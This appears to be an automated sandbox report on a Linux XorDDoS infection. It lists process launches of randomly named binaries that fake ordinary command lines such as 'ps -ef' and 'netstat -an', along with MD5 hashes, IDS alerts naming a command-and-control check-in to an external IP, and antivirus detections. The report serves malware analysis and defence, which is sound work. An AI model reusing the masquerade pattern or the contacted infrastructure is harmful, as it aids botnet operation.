File size:	625878 bytes
MD5 hash:	7ece6ba9fe32b7d91c5dcf497de20033

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/usr/bin/gdmrzwxnqy
Arguments:	-
File size:	625878 bytes
MD5 hash:	7ece6ba9fe32b7d91c5dcf497de20033

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/usr/bin/gdmrzwxnqy
Arguments:	/usr/bin/gdmrzwxnqy who 6230
File size:	625878 bytes
MD5 hash:	7ece6ba9fe32b7d91c5dcf497de20033

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/usr/bin/gdmrzwxnqy
Arguments:	-
File size:	625878 bytes
MD5 hash:	7ece6ba9fe32b7d91c5dcf497de20033

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/usr/bin/gdmrzwxnqy
Arguments:	/usr/bin/gdmrzwxnqy "ps -ef" 6230
File size:	625878 bytes
MD5 hash:	7ece6ba9fe32b7d91c5dcf497de20033

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/usr/bin/gdmrzwxnqy
Arguments:	-
File size:	625878 bytes
MD5 hash:	7ece6ba9fe32b7d91c5dcf497de20033

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/usr/bin/gdmrzwxnqy
Arguments:	/usr/bin/gdmrzwxnqy sh 6230
File size:	625878 bytes
MD5 hash:	7ece6ba9fe32b7d91c5dcf497de20033

Start time (UTC):	13:34:42
Start date (UTC):	20/08/2024
Path:	/usr/bin/gdmrzwxnqy
Arguments:	-
File size:	625878 bytes
MD5 hash:	7ece6ba9fe32b7d91c5dcf497de20033

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	/usr/bin/eperfpvgsg ls 6230
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	-
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	/usr/bin/eperfpvgsg "cat resolv.conf" 6230
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	-
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	/usr/bin/eperfpvgsg ls 6230
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	-
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	/usr/bin/eperfpvgsg "ls -la" 6230
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	-
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	/usr/bin/eperfpvgsg pwd 6230
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:47
Start date (UTC):	20/08/2024
Path:	/usr/bin/eperfpvgsg
Arguments:	-
File size:	625878 bytes
MD5 hash:	c73832bb64ed9d499daa35bea23c2bf5

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	/usr/bin/kfgwgvyckw "sleep 1" 6230
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	-
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	/usr/bin/kfgwgvyckw bash 6230
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	-
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	/usr/bin/kfgwgvyckw id 6230
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	-
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	/usr/bin/kfgwgvyckw "netstat -an" 6230
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	-
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	/usr/bin/kfgwgvyckw "sleep 1" 6230
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:52
Start date (UTC):	20/08/2024
Path:	/usr/bin/kfgwgvyckw
Arguments:	-
File size:	625889 bytes
MD5 hash:	30de9814b108653bd6e70efbc3520d2e

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	/usr/bin/hymrnjeilx bash 6230
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	-
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	/usr/bin/hymrnjeilx pwd 6230
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	-
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	/usr/bin/hymrnjeilx gnome-terminal 6230
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	-
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	/usr/bin/hymrnjeilx gnome-terminal 6230
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	-
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	/usr/bin/hymrnjeilx "ls -la" 6230
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:34:57
Start date (UTC):	20/08/2024
Path:	/usr/bin/hymrnjeilx
Arguments:	-
File size:	625900 bytes
MD5 hash:	c629e828153da3fd68b89cb0ab74ae95

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	/usr/bin/rjhjbiwpsr uptime 6230
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	-
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	/usr/bin/rjhjbiwpsr "grep \"A\"" 6230
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	-
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	/usr/bin/rjhjbiwpsr ls 6230
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	-
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	/usr/bin/rjhjbiwpsr gnome-terminal 6230
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	-
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	/usr/bin/rjhjbiwpsr "cd /etc" 6230
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:02
Start date (UTC):	20/08/2024
Path:	/usr/bin/rjhjbiwpsr
Arguments:	-
File size:	625889 bytes
MD5 hash:	443f96e802359086570a6f584c903966

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	/usr/bin/nopfevkjnk who 6230
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	-
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	/usr/bin/nopfevkjnk top 6230
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	-
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	/usr/bin/nopfevkjnk "sleep 1" 6230
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	-
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	/usr/bin/nopfevkjnk uptime 6230
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	-
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	/usr/bin/nopfevkjnk "grep \"A\"" 6230
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:07
Start date (UTC):	20/08/2024
Path:	/usr/bin/nopfevkjnk
Arguments:	-
File size:	625889 bytes
MD5 hash:	b246baae89c9f63df84f140ebbf62206

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	/usr/bin/vjejifjmgs uptime 6230
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	-
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	/usr/bin/vjejifjmgs id 6230
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	-
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	/usr/bin/vjejifjmgs "grep \"A\"" 6230
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	-
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	/usr/bin/vjejifjmgs sh 6230
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	-
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/tmp/HaJTqGiPpD
Arguments:	-
File size:	625867 bytes
MD5 hash:	a14578469fab44514dfca6c4eead755d

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	/usr/bin/vjejifjmgs pwd 6230
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:35:12
Start date (UTC):	20/08/2024
Path:	/usr/bin/vjejifjmgs
Arguments:	-
File size:	625889 bytes
MD5 hash:	d334dfbf8bb47bf697921a7ccd6b3ad6

Start time (UTC):	13:33:12
Start date (UTC):	20/08/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	13:33:12
Start date (UTC):	20/08/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 8.8.8.8:53 -> 192.168.2.23:45489
Source: Network traffic	Suricata IDS: 2021336 - Severity 1 - ET MALWARE DDoS.XOR Checkin via HTTP : 192.168.2.23:35282 -> 23.253.46.64:80

Source: /usr/bin/posifzmmhg	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/sxruomujjd	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/sotpizdssr	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/kigdktzeum	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ibkljkndlm	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/lib/libudev.so	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/wvbxepjyjx	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/eqznayducj	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/qrabekbstr	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/mizdkrdyqj	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/iulapzbfpq	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/gnmftoxpza	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/becqudbgme	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/buxftyvhwp	Avira: detection malicious, Label: LINUX/Xorddos.cona

Source: /usr/bin/posifzmmhg	Joe Sandbox ML: detected
Source: /usr/bin/sxruomujjd	Joe Sandbox ML: detected
